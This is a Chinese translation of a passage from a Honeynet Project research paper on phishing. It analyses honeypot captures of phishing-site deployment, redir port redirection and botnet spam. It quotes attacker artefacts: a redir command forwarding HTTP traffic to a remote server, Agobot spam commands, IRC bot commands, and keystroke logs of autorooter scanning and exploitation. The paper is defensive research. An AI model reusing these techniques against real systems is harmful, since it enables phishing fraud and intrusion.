了解你的敌人：网络钓鱼(2)

从对两个案例中钓鱼者的键击记录（使用 Sebek 捕获）的观察发现，攻击者在连接到已存在的后满后，立即开始工作，部署他们的钓鱼网站。这些攻击者的动作显示他们对服务器的环境非常熟悉，这也说明他们是前期攻陷这些蜜罐的组织中的成员，而且钓鱼攻击的整个企图也是非常明显且具有组织性的。从上传的网站内容经常指向其他的网站服务器和 IP 地址看来，很可能这些活动同时在多台服务器上同时在进行中。

从对在这些案例中由攻击者下载的钓鱼网站内容的分析中可以明显的看出，钓鱼者在同时以多个知名的在线组织结构为假冒目标。预先精心构造、有官方标志的假冒钓鱼网站被例行性地部署到被攻陷的主机上－经常通过以不同的网页服务器根目录进行分离的“子站点”来同时架设多个组织结构的钓鱼网站，同时安装将垃圾邮件传播给潜在的受害者的必需工具。在英国蜜网项目组观察到的案例中，从 FTP 会话所列出的目录列表中可以确认这些攻击者已经很深的卷入垃圾邮件和网络钓鱼攻击中，预先构建的网站内容和邮件传播攻击被集中存放在一个集中的服务器上，并且看起来攻击的目标至少针对 eBay 、 AOL 和其他几个知名的美国银行。这些个别的网络钓鱼攻击看起来并不是隔离的单独的攻击事件，因为在这些案例中发布的垃圾邮件通常将受害者指向到几个同时存在的假冒网站服务器，同时这些垃圾邮件也同时是从多个系统中发出。从英国案例中蜜罐被攻击后第一个连入对钓鱼网站内容的 HTTP 请求也预示着并行的网络钓鱼攻击操作在进行。

这个连入蜜罐的 HTTP 连接在攻击者在这台蜜罐主机上架设假冒的在线银行网站之前就已经发生，这确认了攻击者已经预先知道这台服务器可以被用来作为一个钓鱼网站的假设。在攻击者在架设这个钓鱼网站的同时，引诱受害者访问这个新钓鱼网站的垃圾邮件已经从另外一台主机上发出。

我们对连入被攻陷的蜜罐请求假冒在线银行内容的 HTTP 请求连接的源 IP 地址数量和范围感到震惊。下面的图给出了在蜜罐从网络中断开前从各个 IP 地址访问钓鱼网站的 HTTP 请求的数目（包括每个 IP 单独计算和全部的 HTTP 请求）。

 

 

访问英国蜜网项目组部署蜜罐上的钓鱼网站内容的源 IP 地址的顶层 DNS 域名、国家和主机操作系统的列表见 此页面 。要注意的是，在蜜罐被离线进行取证分析之前，尽管访问钓鱼网站的网页流量到达英国蜜网项目组部署的蜜罐，但并没有针对处理用户数据处理的 PHP 脚本的 HTTP POST 请求，因此在此次网络钓鱼攻击中，没有任何用户的信息被钓鱼者和我们获得。在本文提及的所有案例中，我们或是直接通报了目标机构关于攻击案例和任何相关的他们所需的相关数据，或是向当地的计算机应急响应组通报了所有相关的恶意行为。在所有案例中，没有任何受害者的私人信息被蜜网项目组和蜜网研究联盟的成员所捕获。

从这两个案例中的数据表明钓鱼者是非常活跃并且具有组织性的，在多个被攻陷的主机中快速地移动，并且同时以多个著名的组织结构为目标。同时数据也显示许多电子邮件用户被引诱访问假冒组织机构（如在线银行和商务网站）的钓鱼网站，网络钓鱼攻击已经给广大的互联网用户带来了安全风险。

第二种网络钓鱼技术－通过端口重定向钓鱼

在 2004 年 11 越，德国蜜网项目组部署了包含一个 Redhat Linux 7.3 蜜罐的经典 第二代蜜网 。虽然安装的是相当旧的操作系统版本，攻击者也能够非常容易就能攻破，但它令人惊讶地经过了两个半月后才被首次成功攻陷－这和以上提及案例中讨论的蜜罐快速被攻陷的情况形成显著的反差。更多关于此趋势的信息可以在“了解你的敌人”系列文章中的“ 了解你的敌人：趋势分析 ”中可以找到。

在 2005 年 1 月 11 日 ，一个攻击者成功地攻陷了这台蜜罐，使用了针对 Redhat Linux 7.3 缺省安装存在的 OpenSSL SSLv2 Malformed Client Key Remote Buffer Overflow Vulnerability 的攻击脚本。此案例不寻常的是当攻击者获得被攻陷主机的访问权后，他并没有直接上传钓鱼网站内容。取而代之的是，攻击者在蜜罐上安装并配置了一个端口重定向服务。

这个端口重定向服务被设计成将发往该蜜罐网站服务器的 HTTP 请求以透明的方式重新路由到另外一个远程的网站服务器，这种方式潜在地使得对钓鱼网站内容更难追踪。攻击者下载并在蜜罐上安装了一个称为 redir 的工具，此工具是一个能够透明地将连入的 TCP 连接转发到一个远程的目标主机的端口 重定向器。在此次案例中，攻击者配置该工具将所有到蜜罐 TCP 80 端口（ HTTP ）的流量重定向到一个位于 中国 的远程网站服务器的 TCP 80 端口。有意思的是，攻击者并没有在蜜罐上安装 Rootkit 以隐藏他的存在，这也说明攻击者并没有把被攻陷的主机的价值看的很重，同时并不担心被检测到。

攻击者使用的建立端口重定向的指令如下：

redir --lport=80 --laddr=<IP address of honeypot> --cport=80 --caddr=221.4.XXX.XXX

另外，攻击者修改了 Linux 系统的启动脚本文件 /etc/rc.d/rc.local 从而保证 redir 端口重定向服务在蜜罐系统重新启动后也会被重新启动，提高了他们的端口重定向服务的生存能力。然后他们开始往外发送钓鱼垃圾邮件以引诱受害者访问此蜜罐，一个示例可以在 此 找到。（注意相关的敏感信息已经被混淆了）。

为了进一步调查攻击者的活动，德国蜜网项目组的成员们干涉并偷偷摸摸修改了攻击者在蜜罐上安装的 redire 工具的配置，使其在 redir 程序内进行日志，使得更容易地观察到多少人接收到此垃圾邮件信息，并点击了其中的链接透明地访问重定向后的钓鱼网站内容。在将近 36 小时的时间段内， 721 个 IP 地址被 redir 重定向到钓鱼网站，我们又一次对这么多用户被发布的钓鱼邮件所引诱访问钓鱼网站内容而感到震惊。对访问端口重定向器的 IP 地址的分析可以在 这 找到（注意这些信息已经被清洁过，以保护访问钓鱼网站的用户，同时在我们的研究中仅记录了 IP 地址数据，任何机密性的用户数据没有被捕获）。

本次攻击案例的一个概要时间线如下表所示：

日期 / 时间

事件

2004 年 11 月 1 日

蜜罐受到首次扫描

2005 年 1 月 11 日 19:13  

蜜罐上的 OpenSSL 服务被攻陷，端口重定向器被安装， 钓鱼垃圾邮件 被发送。

2005 年 1 月 11 日 20:07

对钓鱼网站内容的 网页请求 开始到达蜜罐。

2005 年 1 月 13 日 8:15

蜜罐被离线进行取证分析。

第三种网络钓鱼技术－通过僵尸网络进行钓鱼

蜜网项目组最近发布的一篇文章“ 了解你的敌人：跟踪 僵尸网络 ”介绍了一种追踪僵尸网络的方法。一个僵尸网络是由可被攻击者远程控制的被攻陷主机所构成的网络。由于他们的巨大数量（可以有成千上万的主机一起连接），当僵尸网络被用以分布式拒绝服务攻击时，可以对互联网社区构成巨大的威胁。在 2004 年 10 月的一次调查中，电子邮件安全公司 CipherTrust 得出了 70% 监视到的钓鱼垃圾邮件是从 5 个活跃的僵尸网络中的 1 个所发出的，但是我们的观察显示有更多的僵尸网络已经被用来进行发送垃圾邮件。尽管还没有一个显著的实际案例分析，在本节中我们还是给出了我们对可被攻击者以僵尸网络的方式进行网络钓鱼攻击的工具和技术的观察结果。

案例时间表

在从 2004 年 9 月到 2005 年 1 月的这段时期中，德国蜜网项目组部署了一系列安装未打补丁的微软 Windows 操作系统的蜜罐，以观察僵尸网络活动。我们开发了一个自动化部署的过程，使得蜜罐可以被重复性地部署，攻陷及离线分析。在此期间，超过 100 个不同的僵尸网络被发现，以及上千的文件被获取用以离线分析。

分析

一些在此研究项目中捕获的僵尸工具提供了在被攻陷主机上远程启动一个 SOCKS v4/v5 代理的能力。 SOCKS 为基于 TCP /IP 的网络应用程序提供了一种通用化的代理机制（ RFC 1928 ），可以被用来代理最普遍的互联网流量，如 HTTP 和 SMTP 等。如果攻击者能够成功地通过僵尸网络的控制使得各个远程傀儡主机上都开放 SOCKS 代理服务功能，那么该主机可以被用来发送大量的垃圾邮件，如果僵尸网络中包含成千上万的傀儡主机，那么攻击者可以轻易地发送巨大数量的垃圾邮件，而这些垃圾邮件的发送源头却是覆盖巨大 IP 地址范围的属于一些无戒备心用户的家庭 PC 机。

 

不存在集中的控制点，以及其范围超出了国界使得很难对僵尸网络的活动进行追踪和阻断。这也使得僵尸网络为垃圾邮件发布者和钓鱼者提供了一种低风险的、但高回报的攻击方法。或许不会令人惊讶，富有傀儡资源的僵尸网络拥有者已经开始以犯罪为目标，并且目前也已经出现 租借 僵尸网络 的现象。为了赚取租金，僵尸网络的操作者将会给他的客户提供一个支持 SOCKS v4 的服务器 IP 地址和端口。已经有报道显示僵尸网络被出售给垃圾邮件发布者作为垃圾邮件的转发服务器。 " Uncovered: Trojans as Spam Robots ". 一些捕获的僵尸工具也实现了能够获取 Email 地址，或者通过傀儡主机发送垃圾邮件的特殊功能。下面的列表显示了一些在 Agobot （一个被攻击者非常普遍使用的僵尸工具，其变种也经常在我们的研究过程中被捕获）中实现的与垃圾邮件 / 钓鱼邮件相关的指令：

• harvest.emails – 使得僵尸工具获得一个 Email 地址列表
• harvest.emailshttp – 使得僵尸工具通过 HTTP 获得一个 Email 地址列表
• spam .setlist – 下载一个 Email 地址列表
• spam .settemplate – 下载一个 Email 模板
• spam .start – 开始发送垃圾邮件
• spam .stop – 停止发送垃圾邮件
• aol spam .setlist - AOL - 下载一个 Email 地址列表
• aolspam.settemplate - AOL - 下载一个 Email 模板
• aol spam .setuser - AOL – 设置用户名
• aol spam .setpass - AOL －设置口令
• aol spam .start - "AOL - 开始发送垃圾邮件
• aol spam .stop - "AOL - 停止发送垃圾邮件

关于这些指令实现的进一步信息，可以在 这 找到，以僵尸工具源码的注释形式给出。在 drone －一个由德国蜜网项目组开发的自定制 IRC 客户端的帮助下，通过利用我们的蜜网所捕获的网络连接数据将 drone 混入僵尸网络中，我们可以对僵尸网络如何被用以进行发送垃圾邮件 / 钓鱼邮件进行更深入的了解。以下将给出一些观察到的典型活动案例。

实例 1

在一个特定的僵尸网络中，我们观察到攻击者发出了以下指令（注意 URL 都已经被混淆了）：

<St0n3y> .mm http://www.example.com/email/fetch.php? 4a 005aec5d7dbe3b 01c 75aab2b 1c 9991 http://www.foobar.net/pay.html Joe did_u_send_me_this

.mm (mass emailing) 指令是一个一般化的 spam_start 指令的定制版本。这个指令接收以下 4 个参数：

1. 一个包含多个 Email 地址文件的 URL
2. 包含在垃圾邮件中的目标网站地址链接－这个网站可能是一个普遍的垃圾网页，也可能是一个钓鱼网站
3. 发送者的名字
4. 邮件的主题

在本次攻击案例中，每次调用 fetch.php 脚本会返回 30 个不同的 Email 地址。对于每个收信者，将会构造一个 Email 邮件，将宣传指令中第二个参数给出的链接。在这个实例中，第二个参数的链接指向了一个企图在受害者主机上安装一个恶意 ActiveX 组件的网页。

实例 2

在另一个僵尸网络中，我们观察到在受害者 PC 上安装浏览器助手组件的攻击方式：

[TOPIC] # spam 9 :.open http://amateur.example.com/l33tag3/beta.html -s

.open 指令告诉每个僵尸工具打开所申请的网页并显示给受害者，在这个案例中，这个网页中包含一个浏览器助手组件，企图在受害者主机上安装自身。从这个 IRC 频道的名称可以显示出，这个僵尸网络也是用以发送垃圾邮件的。

实例 3

在另外一个僵尸网络上，我们观察到 spyware 传播的实例：

http://public.example.com/prompt.php?h=6d799fbeef 3a 9b 386587f 5f 7b 37f [...]

这个链接在对捕获到的恶意软件的分析中获得，它将受害者指向了一个提供“免费的广告传播软件”的公司的网页，这个网站包含了在企图访问客户端上安装 ActiveX 组件（推测是 adware 或 spyware ）的多个页面。

 

普遍的攻击旋律

在我们对网络钓鱼攻击的研究过程中发现了一些普遍的攻击旋律，攻击者显然在混合使用一些工具和技术来提高他们成功的机会。我们现在开始分析两种这样的技术－批量扫描和组合式攻击。

批量扫描

通过对一些被攻陷蜜罐的分析表明，系统是自动化的攻击脚本所攻陷，这些自动化攻击脚本通常被称为 autorooters 。在上面描述的两个案例中，一旦攻击者攻陷了蜜罐， autorooter 的 toolkits 就被上传到服务器上，然后攻击者就开始尝试扫描一些 IP 地址空间段来寻找其他同样存在漏洞的服务器（在德国案例中使用的称为 superwu 的扫描器，而在英国案例中使用了 mole 扫描器 ）。在英国案例中捕获的攻击者键击记录如下所示，显示了从被攻陷的蜜罐发起的批量扫描的实例。注意由于蜜网配置，这些往外的恶意流量会被阻断，从而这些攻击不会成功。

攻击者解压缩扫描器，并尝试扫描 B 类地址空间段：
[2004-07-18 15:23:31 bash 0]tar zxvf mole.tgz
[2004-07-18 15:23:33 bash 0]cd mole
[2004-07-18 15:23:38 bash 0]./mazz 63.2
[2004-07-18 15:24:04 bash 0]./mazz 207.55
[2004-07-18 15:25:13 bash 0]./scan 80.82

攻击者尝试攻击潜在的有漏洞的服务器：
[2004-07-19 11:56:46 bash 0]cd mole
[2004-07-19 11:56:50 bash 0]./root -b 0 -v ns1.victim.net
[2004-07-19 11:57:26 bash 0]./root -b 0 -v 66.90.NNN.NNNs

攻击者在一段时间后回来查看已经成功攻陷的服务器列表（这个列表是空的，由于蜜网的配置）：
[2004-07-23 08:13:18 bash 0]cd mole
[2004-07-23 08:13:20 bash 0]ls
[2004-07-23 08:13:25 bash 0]cat hacked.servers

攻击者尝试扫描更多的 B 类地址空间段，并随后测试对选择目标进行攻击：
[2004-07-24 10:24:17 bash 0]cd mole
[2004-07-24 10:24:19 bash 0]./scan 140.130
[2004-07-24 10:24:27 bash 0]./scan 166.80
[2004-07-24 10:25:36 bash 0]./scan 166.4
[2004-07-24 10:26:23 bash 0]./scan 139.93
[2004-07-24 10:27:18 bash 0]./scan 133.200
[2004-07-24 10:36:37 bash 0]./try 202.98.XXX.XXX
[2004-07-24 10:38:17 bash 0]./try 202.98.YYY.YYY
[2004-07-24 10:38:27 bash 0]./try 202.98.YYY.YYY

在上述最后一个例子中，注意攻击者尝试攻陷的几个主机并不在从这个蜜罐扫描的 IP 地址范围内，这又一次提供了批量扫描行为的高协同性和并行性。

对英国攻击者下载的 mole .tgz 文件的进一步调查揭示了在解压后的 aotorooter toolkit 的根目录中有一些 text 文件。这些文件包括扫描配置信息和之前扫描“ grabbb2.x and samba 2.2.8 vulnerability ”的扫描结果日志。在这些文件中还包含 42 个针对其他主机的攻击案例，以及针对多个 B 类地址空间扫描的结果，从而证明了观察到的攻击案例是一个更大的更具组织性的针对类似系统的攻击中的一部分。一个从攻击者的角度查看的 mole 扫描工具的输出结果的实例，可以在 这 找到。

最后，一些从攻陷蜜罐上发现的批量扫描工具看起来并没有广泛地传播，这也显示了这些攻击者拥有超越基本的脚本小子的一定水平的开发能力和工具制造能力，或者是一个并没有将他们的工具共享给公开论坛的封闭社团的成员。又一次，这显示了具有良好组织性的攻击者的能力。

组合式攻击

在我们的研究中，我们也发现了钓鱼者经常组合三种不同的攻击技术。正如我们观察到，并在本文所描述的，一些时候多种方法将提供一些冗余性，并通过一个两层的网络拓扑配置保护他们的网络钓鱼攻击基础设置。下图描述了一种可能的网络钓鱼攻击拓扑结构：

 

在这个实例中，一个中央的网站服务器架设了物理上的钓鱼网站内容，通常包含针对多个目标机构的多个网站（如在 /ebay 目录下有 一个 eBay 钓鱼网站，在 .paypal 目录下有一个 PayPal 钓鱼网站 ）。一些被攻陷的远程主机在 redir 端口重定向器的帮助下将连入 TCP 80 端口的 HTTP 流量重定向到中央的网站服务器。这种方案从攻击者的角度看来比一个单一的钓鱼网站拥有以下的一些优势：